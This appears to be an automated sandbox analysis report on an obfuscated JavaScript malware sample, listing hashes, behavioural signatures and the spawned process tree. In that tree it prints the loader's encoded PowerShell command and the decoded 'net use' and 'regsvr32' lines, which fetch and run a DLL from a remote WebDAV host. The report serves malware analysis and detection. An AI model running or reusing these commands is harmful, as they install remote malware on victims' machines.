Analysis
- Max time kernel: 239s
- Max time network: 240s
- Platform: windows7_x64
- Resource: win7-20240729-en
- Resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- Submitted: 14-11-2024 02:01
Static task: static1
Behavioral task: behavioral1
- Sample: 17481323262171426069.js
- Resource: win7-20240729-en
Behavioral task: behavioral2
- Sample: 17481323262171426069.js
- Resource: win10v2004-20241007-en
General
- Target: 17481323262171426069.js
- Size: 1.4MB
- MD5: efe76939bd74fd51b7c0a2f736d07904
- SHA1: e61ec5426def2b69c1fb953c982cfbde8b196cf5
- SHA256: 8dc5c525c854fa1f7a70c8c996290c8af71b5609279d30d53dcec1984fbd4703
- SHA512: e7527ae59501b7a09f6fa5538ffc0a013fb95d85f83705739ab28887b96d55ab60cda2307afd75cd674d83bc92561c141dc69fdb4514f3d67443d8d972907876
- SSDEEP: 12288:2tSyK/Pok2/p6tnjLo2jLdZ0tr0KXuXTPh03z9pVn1zEPu:GQ/Pok2/p6tnjLo2jLd2WKNpjiu
Malware Config
Signatures
- Obfuscated Files or Information: Command Obfuscation (1 TTPs)
  Adversaries may obfuscate content during command execution to impede detection.
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Delays execution with timeout.exe (1 IoCs)
  Processes: timeout.exe (PID 2784)
- Runs net.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes: regsvr32.exe (PID 2972)
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: powershell.exe (PID 2952)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe (PID 2952), token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description | pid | process | procid_target | occurrences):
  PID 2604 wrote to memory of 2952 | 2604 | wscript.exe | 29 | x3
  PID 2952 wrote to memory of 2784 | 2952 | powershell.exe | 31 | x3
  PID 2952 wrote to memory of 2896 | 2952 | powershell.exe | 32 | x3
  PID 2896 wrote to memory of 2904 | 2896 | cmd.exe | 33 | x3
  PID 2952 wrote to memory of 2852 | 2952 | powershell.exe | 34 | x3
  PID 2852 wrote to memory of 2972 | 2852 | cmd.exe | 35 | x5
Processes
(depth 1) C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\17481323262171426069.js
  PID: 2604
  - Suspicious use of WriteProcessMemory
  (depth 2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand dABpAG0AZQBvAHUAdAAgADEAOwBjAG0AZAAgAC8AYwAgAG4AZQB0ACAAdQBzAGUAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADcAOQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAOwBjAG0AZAAgAC8AYwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA4ADYAMgA2ADEAMgA3ADQANAAxADMANQAxADMALgBkAGwAbAA=
    (the -EncodedCommand argument is base64 over UTF-16LE text; it decodes to the same timeout, net use and regsvr32 command sequence that the child processes below execute)
    PID: 2952
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    (depth 3) C:\Windows\system32\timeout.exe
      Command line: "C:\Windows\system32\timeout.exe" 1
      PID: 2784
      - Delays execution with timeout.exe
    (depth 3) C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\
      PID: 2896
      - Suspicious use of WriteProcessMemory
      (depth 4) C:\Windows\system32\net.exe
        Command line: net use \\94.159.113.79@8888\davwwwroot\
        PID: 2904
    (depth 3) C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\86261274413513.dll
      PID: 2852
      - Suspicious use of WriteProcessMemory
      (depth 4) C:\Windows\system32\regsvr32.exe
        Command line: regsvr32 /s \\94.159.113.79@8888\davwwwroot\86261274413513.dll
        PID: 2972
        - Suspicious behavior: CmdExeWriteProcessMemorySpam